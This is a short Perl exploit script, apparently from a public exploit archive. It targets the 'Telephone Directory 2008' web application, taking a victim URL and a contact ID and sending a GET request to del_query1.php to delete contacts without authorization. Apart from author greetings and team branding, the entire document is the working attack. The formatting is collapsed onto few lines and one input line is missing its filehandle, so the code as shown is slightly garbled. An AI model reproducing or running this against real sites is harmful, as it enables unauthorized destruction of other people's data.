#!/usr/bin/perl -w # Telephone Directory 2008 <= Arbitrary Delete Contact ######################################## #[*] Founded & Exploited by : Stack #[*] Contact: Ev!L =>> see down #[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & hak3r-b0y All muslims HaCkeRs :) #[*] Special Thnx To : Simo64 L3azzzzzz khouya ######################################## #----------------------------------------------------------------------------# ######################################## # * TITLE: PerlSploit Class # * REQUIREMENTS: PHP 4 / PHP 5 # * VERSION: v.1 # * LICENSE: GNU General Public License # * ORIGINAL URL: http://www.v4-Team/v4.txt # * FILENAME: PerlSploitClass.pl # * # * CONTACT: Wanted (french / english / arabic / moroco Darija :d ) # * THNX : AllaH # * GREETZ: Houssamix & Djekmani ######################################## #----------------------------------------------------------------------------# ######################################## system("color f"); print "\t\t############################################################\n\n"; print "\t\t# Telephone Directory 2008 <= Arbitrary Delete Contact #\n\n"; print "\t\t# by Stack #\n\n"; print "\t\t############################################################\n\n"; ######################################## #----------------------------------------------------------------------------# ######################################## use LWP::UserAgent; die "Example: perl $0 http://victim.com/path/\n" unless @ARGV; print "\n[!] ContactID : "; chomp(my $id=); $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $ARGV[0] . "/del_query1.php?id=".$id.""; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /Contact(.*?)
/){ print "\nBrought to you by v4-team.com...\n"; print "\n[+] Contact$1\n";} else{print "\n[-] Exploit Failed...\n";} ######################################## #------------------- Exploit exploited by Stack --------------------# ########################################